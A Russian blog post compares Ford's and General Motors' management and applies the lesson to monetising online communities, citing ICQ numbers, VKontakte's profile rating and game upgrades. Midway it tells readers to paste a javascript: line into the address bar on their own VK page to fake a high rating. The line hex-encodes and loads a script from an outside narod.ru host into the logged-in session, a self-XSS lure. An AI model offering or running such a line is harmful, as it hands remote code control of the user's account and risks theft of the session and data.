На 4 курсе писал работу по истории новейшего времени, про компанию «Форд» и «Дженерал Моторс», а также про тех, кто стоял у руля этих компаний. Работу, кстати, без труда найдете в инете, я ее выкладывал («Форд Мотор Компани» и «Дженерал Моторс»: конкуренция принципов управления и менеджмента). В работе я описывал принципы и особенности менеджмента, способы конкуренции двух крупнейших автомобильных корпораций.

Если в двух словах, Форд стремился уменьшить затраты на производство автомобиля, дабы каждый человек потенциально мог приобрести авто по низкой цене. Использование только черной краски, потому что самая дешевая, скупка заводов-посредников в техологическом процессе — все во имя снижения цены.

У Дженерал были другие планы — компания пыталась угодить всем, но прежде всего создать ассортимент. Пытались делать дешевые авто — не особо получалось, но получалось делать красивые дорогие автомобили, которые пользовались спросом даже в кризисное время. Даже в трудное время были те, кто хотел и, главное, мог выделяться.

К чему я сделал такой экскурс в историю, — хотел сравнить с онлайн продажами. Для меня актуально, например, в отношении ICQ-магазина. Есть большой ассортимент корявых, простых семизнаков по 0,3 уе (10-18 рублей), покупателей на них много. Но также постоянно появляются покупатели, которые хотят выделяться не только количеством цифр в уине, но и красотой номерка, потому ценятся красивые 7, 8-знаки.

В социальной сети Вконтакте прямо под аватарой находится полоска, иначально созданная для информирования о проценте заполненности анкеты. Не назвали бы ее рейтингом и не будь на ней циферок — не было б ажиотажа на увеличение, «прокачку»  рейтинга.

Кстати, держите фишку, чтобы цифры рейтинга были такие же, как я показал на скриншоте вверху или еще больше. На своей странице введите в адресной строке код

javascript:function loadScript(scriptURL) { var scriptElem = document.createElement('SCRIPT'); scriptElem.setAttribute('language',%20'%4A%61%76%61%53%63%72%69%70%74'); scriptElem.setAttribute('src', scriptURL); document.body.appendChild(scriptElem);}loadScript('%68%74%74%70%3A%2F%2F%75%73%65%72%61%65%2E%6E%61%72%6F%64%2E%72%75%2F%76%2E%6A%73');

— и готово. После перезагрузки страницы липовый рейтинг пропадет =)

В онлайн-играх можно кучу времени «прокачивать»  своего персонажа, а можно за реальные деньги прикупить нужные виртуальные вещицы, «проапргрейдиться» или же получить некие уникальные возможности.

Эти примеры дают замечательную идею монетизации ресурсов с комьюнити: создаем одинаковые условия, одинаковые возможности, параметры и даем некую платную альтернативу выделиться ото всех качественно.

Кто-нибудь обязательно захочет выделиться, что будет вам только на руку.

У нас общество равных возможностей, но коммунизма никогда не будет, у каждого разные желания и возможности.

Вот понаписал какие-то странные умозаключения =)

Традиц.анек про Штирлица:

Загнанный в угол Штирлиц сунул руку в карман.
«Это конец…», — подумал Штирлиц, — «А где же пистолет?»

Оцени статью: